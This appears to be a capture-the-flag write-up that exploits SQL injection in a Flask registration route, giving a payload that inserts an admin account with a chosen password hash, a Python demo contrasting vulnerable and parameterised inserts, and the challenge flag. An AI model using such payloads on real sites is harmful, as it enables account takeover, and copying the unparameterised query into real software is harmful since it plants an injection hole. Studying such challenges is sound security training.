Very Vulnerable Site

~# cat Question

So i think this site is pretty unbreakable. The flag seems to be impossible to obtain to me, but apparently there are multiple ways to get the flag? Maybe I'm just dumb...

FILE: VeryVulnerableSite.zip

Running the instance will bring us to a website with a login and register page that requires us to input a username and password to get the flag.

The app.py file inside VeryVulnerableSite.zip is the source of the running site, and the function of concern is register(). It takes the username and password from the form, hashes the password with SHA-256, inserts the username, the hash and a default admin value of 0 into a SQLite database, then redirects to the index page with a success message. The username is formatted straight into the INSERT statement with an f-string instead of being bound as a parameter (the comment in the code even hints at the missing "question mark thing"), so whatever is typed into the username field becomes part of the SQL. This is the part of the code that matters:

from hashlib import sha256
import sqlite3

from flask import Flask, redirect, request, url_for

app = Flask(__name__)


@app.route('/register', methods=['POST'])
def register():
  username = request.form['username']
  password = request.form['password']
  # The password is hashed before storage; the username is not touched.
  phash = sha256(password.encode('utf-8')).hexdigest()

  conn = sqlite3.connect('database.db')
  cur = conn.cursor()
  ## Wait how do I use the question mark thing again?
  # Injection point: username is interpolated into the statement unescaped.
  cur.execute(f"INSERT INTO users (username, password, admin) VALUES ('{username}', '{phash}', 0)")
  conn.commit()

  return redirect(url_for('index', message='Successfully registered!'))

Crafting the payload

[username]','[SHA-256 hex digest of password]',1)--

Put this whole string into the username field; the password field of the form can hold anything. The first quote closes the username literal, the next two values supply our own password hash and admin = 1, the closing parenthesis completes the VALUES list, and the trailing -- turns the rest of the original statement (the server-computed hash and the default admin value of 0) into an SQL comment. Without the closing parenthesis SQLite rejects the statement as incomplete input, so the row is only created when the injected fragment leaves a syntactically complete INSERT behind.

Because the hash is injected directly through the username field, it bypasses the application's own hashing of the form password: the stored hash is the SHA-256 of whatever password you chose when building the payload, so logging in with [username] and that password succeeds, and the account is created with admin = 1. After registering with this payload, you can log into the created account and the flag is displayed.

The SQL payload was built around this line of the code, which after injection becomes INSERT INTO users (username, password, admin) VALUES ('[username]','[hash]',1)--', '[server hash]', 0):

cur.execute(f"INSERT INTO users (username, password, admin) VALUES ('{username}', '{phash}', 0)")
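To see exactly what the injected INSERT stores, here is an added example (not part of the original writeup or the challenge's own code) that reproduces the challenge's string-formatted query against an in-memory SQLite database, builds the payload from a chosen username and password, and contrasts it with the parameterised version of the same insert. The table layout (username, password, admin) and the login check (hash the submitted password and compare it with the stored hash) are assumptions, since the page only shows the register() route.

```python
import sqlite3
from hashlib import sha256

# Assumed schema: the challenge's INSERT names these three columns.
SCHEMA = "CREATE TABLE users (username TEXT, password TEXT, admin INTEGER)"


def password_hash(password):
    """Same hashing the challenge applies to the form password."""
    return sha256(password.encode("utf-8")).hexdigest()


def vulnerable_register(conn, username, password):
    """Mirror of the challenge's register(): the username is interpolated
    into the SQL text, so it can rewrite the statement."""
    phash = password_hash(password)
    cur = conn.cursor()
    cur.execute(f"INSERT INTO users (username, password, admin) VALUES ('{username}', '{phash}', 0)")
    conn.commit()


def safe_register(conn, username, password):
    """The fix the code comment was looking for: bound parameters, so the
    username is stored as data and can never change the statement."""
    phash = password_hash(password)
    cur = conn.cursor()
    cur.execute("INSERT INTO users (username, password, admin) VALUES (?, ?, 0)", (username, phash))
    conn.commit()


def build_payload(username, password):
    """Username field value: closes the username literal, supplies our own
    hash and admin=1, closes the VALUES list, comments out the remainder."""
    return f"{username}','{password_hash(password)}',1)--"


def login_ok(conn, username, password):
    """Assumed login logic: compare SHA-256 of the submitted password with
    the stored hash. Returns the admin flag on success, None on failure."""
    row = conn.execute(
        "SELECT password, admin FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None or row[0] != password_hash(password):
        return None
    return row[1]


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def demo():
    # Constructed example credentials: what the attacker will later type
    # into the login form.
    target_user, target_pass = "hacker", "letmein"
    payload = build_payload(target_user, target_pass)

    vuln = fresh_db()
    # The form password is irrelevant; its hash ends up inside the comment.
    vulnerable_register(vuln, payload, "whatever")
    stored_vuln = vuln.execute(
        "SELECT username, password, admin FROM users"
    ).fetchall()

    safe = fresh_db()
    safe_register(safe, payload, "whatever")
    stored_safe = safe.execute(
        "SELECT username, password, admin FROM users"
    ).fetchall()

    return {
        "payload": payload,
        "vulnerable_rows": stored_vuln,
        "vulnerable_login_admin": login_ok(vuln, target_user, target_pass),
        "safe_rows": stored_safe,
        # With parameters the payload text itself is the username.
        "safe_login_admin": login_ok(safe, payload, "whatever"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Running it shows the vulnerable insert producing a single row (hacker, sha256("letmein"), 1) that logs in as admin, while the parameterised insert stores the entire payload string as a harmless username with admin = 0.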

Flag: ACSI{a_v3ry+v8lner4b13_p4g3_w1th_55t1_7wt_5q1i}
